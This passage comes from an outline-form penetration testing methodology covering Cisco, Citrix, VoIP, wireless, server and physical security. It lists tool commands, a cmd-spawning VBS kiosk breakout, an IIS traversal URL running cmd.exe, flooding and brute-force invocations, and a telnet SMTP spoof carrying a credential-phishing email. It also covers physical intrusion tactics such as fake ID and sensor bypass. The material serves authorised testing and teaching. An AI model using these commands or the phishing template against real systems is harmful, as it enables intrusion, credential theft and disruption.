19.6.1. Attack Tools
19.6.1.1. Untitled
19.6.1.1.1. Untitled
19.6.1.2. Untitled
19.6.1.2.1. Web browse to the Cisco device: http://<IP>
19.6.1.2.2. Untitled
19.6.1.2.3. Untitled
19.6.1.2.4. Untitled
19.6.1.3. Untitled
19.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
19.6.2. Common Vulnerabilities and Exploits (CVE) Information
19.6.2.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
19.7. Configuration Files.
19.7.1. Untitled
19.7.1.1. Configuration files explained
19.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superseded by the enable secret password for remote access.
19.7.1.1.2. Untitled
19.7.1.1.3. Untitled
19.7.1.1.4. Password Encryption Utilised
19.7.1.1.5. Untitled
19.7.1.2. Configuration Testing Tools
19.7.1.2.1. Nipper
19.7.1.2.2. fwauto (Beta)
19.8. References.
19.8.1. Cisco IOS Exploitation Techniques
20. Citrix Specific Testing
20.1. Citrix provides remote access services to multiple users across a wide range of platforms. I have put together the following information, which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix.
20.2. Enumeration
20.2.1. web search
20.2.1.1. Google (GHDB)
20.2.1.1.1. ext:ica
20.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
20.2.1.1.3. [WFClient] Password= filetype:ica
20.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
20.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
20.2.1.1.6. inurl:/Citrix/Nfuse17/
20.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
20.2.1.2. Google Hacks (Author Discovered)
20.2.1.2.1. filetype:ica Username=
20.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx
20.2.1.2.3. inurl:/Citrix/AccessPlatform/
20.2.1.2.4. inurl:LogonAgent/Login.asp
20.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp
20.2.1.2.6. inurl:/Citrix/NFuse161/login.asp
20.2.1.2.7. inurl:/Citrix/NFuse16
20.2.1.2.8. inurl:/Citrix/NFuse151/
20.2.1.2.9. allintitle:MetaFrame XP Login
20.2.1.2.10. allintitle:MetaFrame Presentation Server Login
20.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
20.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login
20.2.1.3. Yahoo
20.2.1.3.1. originurlextension:ica
20.2.2. site search
20.2.2.1. Manual
20.2.2.1.1. review web page for useful information
20.2.2.1.2. review source for web page
20.2.3. generic
20.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
20.2.3.2. amap -bqv ip_address port_no.
20.2.4. citrix specific
20.2.4.1. enum.pl
20.2.4.1.1. perl enum.pl ip_address
20.2.4.2. enum.js
20.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address
20.2.4.3. connect.js
20.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application
20.2.4.4. Citrix-pa-scan
20.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
20.2.4.5. pabrute.c
20.2.4.5.1. ./pabrute pubapp list app_list ip_address
20.2.5. Default Ports
20.2.5.1. TCP
20.2.5.1.1. Citrix XML Service
20.2.5.1.2. Advanced Management Console
20.2.5.1.3. Citrix SSL Relay
20.2.5.1.4. ICA sessions
20.2.5.1.5. Server to server
20.2.5.1.6. Management Console to server
20.2.5.1.7. Session Reliability (Auto-reconnect)
20.2.5.1.8. License Management Console
20.2.5.1.9. License server
20.2.5.2. UDP
20.2.5.2.1. Clients to ICA browser service
20.2.5.2.2. Server-to-server
20.2.6. nmap nse scripts
20.2.6.1. citrix-enum-apps
20.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
20.2.6.2. citrix-enum-apps-xml
20.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
20.2.6.3. citrix-enum-servers
20.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604
20.2.6.4. citrix-enum-servers-xml
20.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
20.2.6.5. citrix-brute-xml
20.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
20.3. Scanning
20.3.1. Nessus
20.3.1.1. Plugins
20.3.1.1.1. CGI abuses
20.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
20.3.1.1.3. Misc.
20.3.1.1.4. Service Detection
20.3.1.1.5. Web Servers
20.3.1.1.6. Windows
20.3.2. Nikto
20.3.2.1. perl nikto.pl -host ip_address -port port_no.
20.3.2.1.1. Untitled
20.4. Exploitation
20.4.1. Alter default .ica files
20.4.1.1. InitialProgram=cmd.exe
20.4.1.2. InitialProgram=explorer.exe
20.4.2. Enumerate and Connect
20.4.2.1. For applications identified by Citrix-pa-scan
20.4.2.1.1. Pas
20.4.2.2. For published applications with a Citrix client when the master browser is non-public.
20.4.2.2.1. Citrix-pa-proxy
20.4.3. Manual Testing
20.4.3.1. Create Batch File (cmd.bat)
20.4.3.1.1. 1
20.4.3.1.2. 2
20.4.3.2. Host Scripting File (cmd.vbs)
20.4.3.2.1. Option Explicit
20.4.3.2.2. Dim objShell
20.4.3.2.3. objShell.Run "%comspec% /k"
20.4.3.2.4. WScript.Quit
20.4.3.2.5. alternative functionality
20.4.3.3. iKat
20.4.3.3.1. Integrated Kiosk Attack Tool
20.4.3.4. AT Command - privilege escalation
20.4.3.4.1. AT HH:MM /interactive "cmd.exe"
20.4.3.4.2. AT HH:MM /interactive %comspec% /k
20.4.3.4.3. Untitled
20.4.3.5. Keyboard Shortcuts/ Hotkeys
20.4.3.5.1. Ctrl + h – View History
20.4.3.5.2. Ctrl + n – New Browser
20.4.3.5.3. Shift + Left Click – New Browser
20.4.3.5.4. Ctrl + o – Internet Address (browse feature)
20.4.3.5.5. Ctrl + p – Print (to file)
20.4.3.5.6. Right Click (Shift + F10)
20.4.3.5.7. F1 – Jump to URL
20.4.3.5.8. SHIFT+F1: Local Task List
20.4.3.5.9. SHIFT+F2: Toggle Title Bar
20.4.3.5.10. SHIFT+F3: Close Remote Application
20.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
20.4.3.5.12. CTRL+F2: Remote Task List
20.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
20.4.3.5.14. ALT+F2: Cycle through programs
20.4.3.5.15. ALT+PLUS: Alt+TAB
20.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB
20.5. Brute Force
20.5.1. bforce.js
20.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
20.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
20.5.1.3. Untitled
20.6. Review Configuration Files
20.6.1. Application server configuration file
20.6.1.1. appsrv.ini
20.6.1.1.1. Location
20.6.1.1.2. World writeable
20.6.1.1.3. Review other files
20.6.1.1.4. Sample file
20.6.2. Program Neighborhood configuration file
20.6.2.1. pn.ini
20.6.2.1.1. Location
20.6.2.1.2. Review other files
20.6.2.1.3. Sample file
20.6.3. Citrix ICA client configuration file
20.6.3.1. wfclient.ini
20.6.3.1.1. Location
20.7. References
20.7.1. Vulnerabilities
20.7.1.1. Art of Hacking
20.7.1.2. Common Vulnerabilities and Exploits (CVE)
20.7.1.2.1. Sample file
20.7.1.2.2. Untitled
20.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
20.7.1.3. OSVDB
20.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=search
20.7.1.4. Secunia
20.7.1.5. Security-database.com
20.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
20.7.1.6. SecurityFocus
20.7.2. Support
20.7.2.1. Citrix
20.7.2.1.1. Knowledge Base
20.7.2.2. Thinworld
20.7.3. Exploits
20.7.3.1. Milw0rm
20.7.3.1.1. http://www.milw0rm.com/search.php
20.7.3.2. Art of Hacking
20.7.3.2.1. Citrix
20.7.4. Tools Resource
20.7.4.1. Zip file containing the majority of tools mentioned in this article, for easy download/ access
21. Network Backbone
21.1. Generic Toolset
21.1.1. Wireshark (Formerly Ethereal)
21.1.1.1. Passive Sniffing
21.1.1.1.1. Usernames/Passwords
21.1.1.1.2. Email
21.1.1.1.3. FTP
21.1.1.1.4. HTTP
21.1.1.1.5. HTTPS
21.1.1.1.6. RDP
21.1.1.1.7. VOIP
21.1.1.1.8. Other
21.1.1.2. Filters
21.1.1.2.1. ip.src == ip_address
21.1.1.2.2. ip.dst == ip_address
21.1.1.2.3. tcp.dstport == port_no.
21.1.1.2.4. ! ip.addr == ip_address
21.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
21.1.2. Cain & Abel
21.1.2.1. Active Sniffing
21.1.2.1.1. ARP Cache Poisoning
21.1.2.1.2. DNS Poisoning
21.1.2.1.3. Routing Protocols
21.1.3. Cisco-Torch
21.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
21.1.4. NTP-Fingerprint
21.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
21.1.5. Yersinia
21.1.6. p0f
21.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
21.1.7. Manual Check (Credentials required)
21.1.8. MAC Spoofing
21.1.8.1. mac address changer for windows
21.1.8.2. macchanger
21.1.8.2.1. Random Mac Address:- macchanger -r eth0
21.1.8.3. madmacs
21.1.8.4. smac
21.1.8.5. TMAC
22. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
22.1. Password Attacks
22.1.1. Known Accounts
22.1.1.1. Identified Passwords
22.1.1.2. Unidentified Hashes
22.1.2. Default Accounts
22.1.2.1. Identified Passwords
22.1.2.2. Unidentified Hashes
22.2. Exploits
22.2.1. Successful Exploits
22.2.1.1. Accounts
22.2.1.1.1. Passwords
22.2.1.1.2. Groups
22.2.1.1.3. Other Details
22.2.1.2. Services
22.2.1.3. Backdoor
22.2.1.4. Connectivity
22.2.2. Unsuccessful Exploits
22.2.3. Resources
22.2.3.1. Securiteam
22.2.3.1.1. Exploits are sorted by year and must be downloaded individually
22.2.3.2. SecurityForest
22.2.3.2.1. Updated via CVS after initial install
22.2.3.3. GovernmentSecurity
22.2.3.3.1. Need to create an account to obtain access
22.2.3.4. Red Base Security
22.2.3.4.1. Oracle Exploit site only
22.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
22.2.3.5.1. Wireless Exploit Site
22.2.3.6. PacketStorm Security
22.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
22.2.3.7. SecWatch
22.2.3.7.1. Exploits sorted by year and month, download separately
22.2.3.8. SecurityFocus
22.2.3.8.1. Exploits must be downloaded individually
22.2.3.9. Metasploit
22.2.3.9.1. Install and regularly update via svn
22.2.3.10. Milw0rm
22.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!
22.3. Tools
22.3.1. Metasploit
22.3.1.1. Free Extra Modules
22.3.1.1.1. local copy
22.3.2. Manual SQL Injection
22.3.2.1. Understanding SQL Injection
22.3.2.2. SQL Injection walkthrough
22.3.2.3. SQL Injection by example
22.3.2.4. Blind SQL Injection
22.3.2.5. Advanced SQL Injection in SQL Server
22.3.2.6. More Advanced SQL Injection
22.3.2.7. Advanced SQL Injection in Oracle databases
22.3.2.8. SQL Cheatsheets
22.3.2.8.1. Untitled
22.3.3. SQL Power Injector
22.3.4. SecurityForest
22.3.5. SPI Dynamics WebInspect
22.3.6. Core Impact
22.3.7. Cisco Global Exploiter
22.3.8. PIXDos
22.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]
22.3.9. CANVAS
22.3.10. Inguma
23. Server Specific Tests
23.1. Databases
23.1.1. Direct Access Interrogation
23.1.1.1. MS SQL Server
23.1.1.1.1. Ports
23.1.1.1.2. Version
23.1.1.1.3. osql
23.1.1.2. Oracle
23.1.1.2.1. Ports
23.1.1.2.2. TNS Listener
23.1.1.2.3. SQL Plus
23.1.1.2.4. Default Account/Passwords
23.1.1.2.5. Default SID's
23.1.1.3. MySQL
23.1.1.3.1. Ports
23.1.1.3.2. Version
23.1.1.3.3. Users/Passwords
23.1.1.4. DB2
23.1.1.5. Informix
23.1.1.6. Sybase
23.1.1.7. Other
23.1.2. Scans
23.1.2.1. Default Ports
23.1.2.2. Non-Default Ports
23.1.2.3. Instance Names
23.1.2.4. Versions
23.1.3. Password Attacks
23.1.3.1. Sniffed Passwords
23.1.3.1.1. Cracked Passwords
23.1.3.1.2. Hashes
23.1.3.2. Direct Access Guesses
23.1.4. Vulnerability Assessment
23.1.4.1. Automated
23.1.4.1.1. Reports
23.1.4.1.2. Vulnerabilities
23.1.4.2. Manual
23.1.4.2.1. Patch Levels
23.1.4.2.2. Confirmed Vulnerabilities
23.2. Mail
23.2.1. Scans
23.2.2. Fingerprint
23.2.2.1. Manual
23.2.2.2. Automated
23.2.3. Spoofable
23.2.3.1. Telnet spoof
23.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected].
23.2.4. Relays
23.3. VPN
23.3.1. Scanning
23.3.1.1. 500 UDP IPSEC
23.3.1.2. 1723 TCP PPTP
23.3.1.3. 443 TCP/SSL
23.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27
23.3.1.5. ipsecscan 80.75.68.22 80.75.68.27
23.3.2. Fingerprinting
23.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27
23.3.3. PSK Crack
23.3.3.1. ikeprobe 80.75.68.27
23.3.3.2. sniff for responses with C&A or ikecrack
23.4. Web
23.4.1. Vulnerability Assessment
23.4.1.1. Automated
23.4.1.1.1. Reports
23.4.1.1.2. Vulnerabilities
23.4.1.2. Manual
23.4.1.2.1. Patch Levels
23.4.1.2.2. Confirmed Vulnerabilities
23.4.2. Permissions
23.4.2.1. PUT /test.txt HTTP/1.0
23.4.2.2. CONNECT mail.another.com:25 HTTP/1.0
23.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6
23.4.3. Scans
23.4.4. Fingerprinting
23.4.4.1. Other
23.4.4.2. HTTP
23.4.4.2.1. Commands
23.4.4.2.2. Modules
23.4.4.2.3. File Extensions
23.4.4.3. HTTPS
23.4.4.3.1. Commands
23.4.4.3.2. Commands
23.4.4.3.3. File Extensions
23.4.5. Directory Traversal
23.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
24. VoIP Security
24.1. Sniffing Tools
24.1.1. AuthTool
24.1.2. Cain & Abel
24.1.3. Etherpeek
24.1.4. NetDude
24.1.5. Oreka
24.1.6. PSIPDump
24.1.7. SIPomatic
24.1.8. SIPv6 Analyzer
24.1.9. UCSniff
24.1.10. VoiPong
24.1.11. VOMIT
24.1.12. Wireshark
24.1.13. WIST - Web Interface for SIP Trace
24.2. Scanning and Enumeration Tools
24.2.1. enumIAX
24.2.2. fping
24.2.3. IAX Enumerator
24.2.4. iWar
24.2.5. Nessus
24.2.6. Nmap
24.2.7. SIP Forum Test Framework (SFTF)
24.2.8. SIPcrack
24.2.9. sipflanker
24.2.9.1. python sipflanker.py 192.168.1-254
24.2.10. SIP-Scan
24.2.11. SIP.Tastic
24.2.12. SIPVicious
24.2.13. SiVuS
24.2.14. SMAP
24.2.14.1. smap IP_Address/Subnet_Mask
24.2.14.2. smap -o IP_Address/Subnet_Mask
24.2.14.3. smap -l IP_Address
24.2.15. snmpwalk
24.2.16. VLANping
24.2.17. VoIPAudit
24.2.18. VoIP GHDB Entries
24.2.19. VoIP Voicemail Database
24.3. Packet Creation and Flooding Tools
24.3.1. H.323 Injection Files
24.3.2. H225regreject
24.3.3. IAXHangup
24.3.4. IAXAuthJack
24.3.5. IAX.Brute
24.3.6. IAXFlooder
24.3.6.1. ./iaxflood sourcename destinationname numpackets
24.3.7. INVITE Flooder
24.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets
24.3.8. kphone-ddos
24.3.9. RTP Flooder
24.3.10. rtpbreak
24.3.11. Scapy
24.3.12. Seagull
24.3.13. SIPBomber
24.3.14. SIPNess
24.3.15. SIPp
24.3.16. SIPsak
24.3.16.1. Tracing paths: sipsak -T -s sip:username@domain
24.3.16.2. Options request: sipsak -vv -s sip:username@domain
24.3.16.3. Query registered bindings: sipsak -I -C empty -a password -s sip:username@domain
24.3.17. SIP-Send-Fun
24.3.18. SIPVicious
24.3.19. Spitter
24.3.20. TFTP Brute Force
24.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>
24.3.21. UDP Flooder
24.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
24.3.22. UDP Flooder (with VLAN Support)
24.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority vlan_id no_of_packets
24.3.23. Voiphopper
24.4. Fuzzing Tools
24.4.1. Asteroid
24.4.2. Codenomicon VoIP Fuzzers
24.4.3. Fuzzy Packet
24.4.4. Mu Security VoIP Fuzzing Platform
24.4.5. ohrwurm RTP Fuzzer
24.4.6. PROTOS H.323 Fuzzer
24.4.7. PROTOS SIP Fuzzer
24.4.8. SIP Forum Test Framework (SFTF)
24.4.9. Sip-Proxy
24.4.10. Spirent ThreatEx
24.5. Signaling Manipulation Tools
24.5.1. AuthTool
24.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
24.5.2. BYE Teardown
24.5.3. Check Sync Phone Rebooter
24.5.4. RedirectPoison
24.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"
24.5.5. Registration Adder
24.5.6. Registration Eraser
24.5.7. Registration Hijacker
24.5.8. SIP-Kill
24.5.9. SIP-Proxy-Kill
24.5.10. SIP-RedirectRTP
24.5.11. SipRogue
24.5.12. vnak
24.6. Media Manipulation Tools
24.6.1. RTP InsertSound
24.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
24.6.2. RTP MixSound
24.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
24.6.3. RTPProxy
24.6.4. RTPInject
24.7. Generic Software Suites
24.7.1. OAT Office Communication Server Tool Assessment
24.7.2. EnableSecurity VOIPPACK
24.7.2.1. Note: Add-on for Immunity Canvas
24.8. References
24.8.1. URLs
24.8.1.1. Common Vulnerabilities and Exploits (CVE)
24.8.1.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
24.8.1.2. Default Passwords
24.8.1.3. Hacking Exposed VoIP
24.8.1.3.1. Tool Pre-requisites
24.8.1.4. VoIPsa
24.8.2. White Papers
24.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems
24.8.2.2. An Analysis of VoIP Security Threats and Tools
24.8.2.3. Hacking VoIP Exposed
24.8.2.4. Security testing of SIP implementations
24.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks
24.8.2.6. Two attacks against VoIP
24.8.2.7. VoIP Attacks!
24.8.2.8. VoIP Security Audit Program (VSAP)
25. Wireless Penetration
25.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All of this information is needed to give the tester (and hence the customer) a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.
25.1.1. Site Map
25.1.1.1. RF Map
25.1.1.1.1. Lines of Sight
25.1.1.1.2. Signal Coverage
25.1.1.2. Physical Map
25.1.1.2.1. Triangulate APs
25.1.1.2.2. Satellite Imagery
25.1.2. Network Map
25.1.2.1. MAC Filter
25.1.2.1.1. Authorised MAC Addresses
25.1.2.1.2. Reaction to Spoofed MAC Addresses
25.1.2.2. Encryption Keys utilised
25.1.2.2.1. WEP
25.1.2.2.2. WPA/PSK
25.1.2.2.3. 802.1x
25.1.2.3. Access Points
25.1.2.3.1. ESSID
25.1.2.3.2. BSSIDs
25.1.2.4. Wireless Clients
25.1.2.4.1. MAC Addresses
25.1.2.4.2. Intercepted Traffic
25.2. Wireless Toolkit
25.2.1. Wireless Discovery
25.2.1.1. Aerosol
25.2.1.2. Airfart
25.2.1.3. Aphopper
25.2.1.4. Apradar
25.2.1.5. BAFFLE
25.2.1.6. inSSIDer
25.2.1.7. iWEPPro
25.2.1.8. karma
25.2.1.9. KisMAC-ng
25.2.1.10. Kismet
25.2.1.11. MiniStumbler
25.2.1.12. Netstumbler
25.2.1.13. Vistumbler
25.2.1.14. Wellenreiter
25.2.1.15. Wifi Hopper
25.2.1.16. WirelessMon
25.2.1.17. WiFiFoFum
25.2.2. Packet Capture
25.2.2.1. Airopeek
25.2.2.2. Airpcap
25.2.2.3. Airtraf
25.2.2.4. Apsniff
25.2.2.5. Cain
25.2.2.6. Commview
25.2.2.7. Ettercap
25.2.2.8. Netmon
25.2.2.8.1. nmwifi
25.2.2.9. Wireshark
25.2.3. EAP Attack tools
25.2.3.1. eapmd5pass
25.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump
25.2.4. Leap Attack Tools
25.2.4.1. asleap
25.2.4.2. thc leap cracker
25.2.4.3. anwrap
25.2.5. WEP/ WPA Password Attack Tools
25.2.5.1. Airbase
25.2.5.2. Aircrack-ptw
25.2.5.3. Aircrack-ng
25.2.5.4. Airsnort
25.2.5.5. cowpatty
25.2.5.6. FiOS Wireless Key Calculator
25.2.5.7. iWifiHack
25.2.5.8. KisMAC-ng
25.2.5.9. Rainbow Tables
25.2.5.10. wep attack
25.2.5.11. wep crack
25.2.5.12. wzcook
25.2.6. Frame Generation Software
25.2.6.1. Airgobbler
25.2.6.2. airpwn
25.2.6.3. Airsnarf
25.2.6.4. Commview
25.2.6.5. fake ap
25.2.6.6. void 11
25.2.6.7. wifi tap
25.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]
25.2.6.8. FreeRADIUS - Wireless Pwnage Edition
25.2.7. Mapping Software
25.2.7.1. Online Mapping
25.2.7.1.1. WIGLE
25.2.7.1.2. Skyhook
25.2.7.2. Tools
25.2.7.2.1. Knsgem
25.2.8. File Format Conversion Tools
25.2.8.1. ns1 recovery and conversion tool
25.2.8.2. warbable
25.2.8.3. warkizniz
25.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
25.2.8.4. ivstools
25.2.9. IDS Tools
25.2.9.1. WIDZ
25.2.9.2. War Scanner
25.2.9.3. Snort-Wireless
25.2.9.4. AirDefense
25.2.9.5. AirMagnet
25.3. WLAN discovery
25.3.1. Unencrypted WLAN
25.3.1.1. Visible SSID
25.3.1.1.1. Sniff for IP range
25.3.1.2. Hidden SSID
25.3.1.2.1. Deauth client
25.3.2. WEP encrypted WLAN
25.3.2.1. Visible SSID
25.3.2.1.1. WEPattack
25.3.2.2. Hidden SSID
25.3.2.2.1. Deauth client
25.3.3. WPA / WPA2 encrypted WLAN
25.3.3.1. Deauth client
25.3.3.1.1. Capture EAPOL handshake
25.3.4. LEAP encrypted WLAN
25.3.4.1. Deauth client
25.3.4.1.1. Break LEAP
25.3.5. 802.1x WLAN
25.3.5.1. Create Rogue Access Point
25.3.5.1.1. Airsnarf
25.3.5.1.2. fake ap
25.3.5.1.3. Hotspotter
25.3.5.1.4. Karma
25.3.5.1.5. Linux rogue AP
25.3.6. Resources
25.3.6.1. URLs
25.3.6.1.1. Wirelessdefence.org
25.3.6.1.2. Russix
25.3.6.1.3. Wardrive.net
25.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)
25.3.6.2. White Papers
25.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4
25.3.6.2.2. 802.11b Firmware-Level Attacks
25.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective
25.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment
25.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds
25.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz
25.3.6.2.7. Active behavioral fingerprinting of wireless devices
25.3.6.3. Common Vulnerabilities and Exploits (CVE)
25.3.6.3.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
26. Physical Security
26.1. Building Security
26.1.1. Meeting Rooms
26.1.1.1. Check for active network jacks.
26.1.1.2. Check for any information in room.
26.1.2. Lobby
26.1.2.1. Check for active network jacks.
26.1.2.2. Does receptionist/guard leave lobby?
26.1.2.3. Accessible printers? Print a test page.
26.1.2.4. Obtain phone/personnel listing.
26.1.3. Communal Areas
26.1.3.1. Check for active network jacks.
26.1.3.2. Check for any information in room.
26.1.3.3. Listen for employee conversations.
26.1.4. Room Security
26.1.4.1. Resistance of lock to picking.
26.1.4.1.1. What types of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors?
26.1.4.2. Ceiling access areas.
26.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?
26.1.5. Windows
26.1.5.1. Check windows/doors for visible intruder alarm sensors.
26.1.5.2. Check visible areas for sensitive information.
26.1.5.3. Can you video users logging on?
26.2. Perimeter Security
26.2.1. Fence Security
26.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.
26.2.2. Exterior Doors
26.2.2.1. If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.
26.2.3. Guards
26.2.3.1. Patrol Routines
26.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.
26.2.3.2. Communications
26.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.
26.3. Entry Points
26.3.1. Guarded Doors
26.3.1.1. Piggybacking
26.3.1.1.1. Attempt to closely follow employees into the building without having to show valid credentials.
26.3.1.2. Fake ID
26.3.1.2.1. Attempt to use fake ID to gain access.
26.3.1.3. Access Methods
26.3.1.3.1. Test 'out of hours' entry methods
26.3.2. Unguarded Doors
26.3.2.1. Identify all unguarded entry points.
26.3.2.1.1. Are doors secured?
26.3.2.1.2. Check locks for resistance to lock picking.
26.3.3. Windows
26.3.3.1. Check windows/doors for visible intruder alarm sensors.
26.3.3.1.1. Attempt to bypass sensors.
26.4. Office Waste
26.4.1. Dumpster Diving. Attempt to retrieve any useful information from ToE refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs etc.
27. Final Report - template
28. Contributors
28.1. Matt Byrne (WirelessDefence.org)
28.1.1. Matt contributed the majority of the Wireless section.
28.2. Arvind Doraiswamy (Paladion.net)
28.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
28.3. Lee Lawson (Dns.co.uk)
28.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.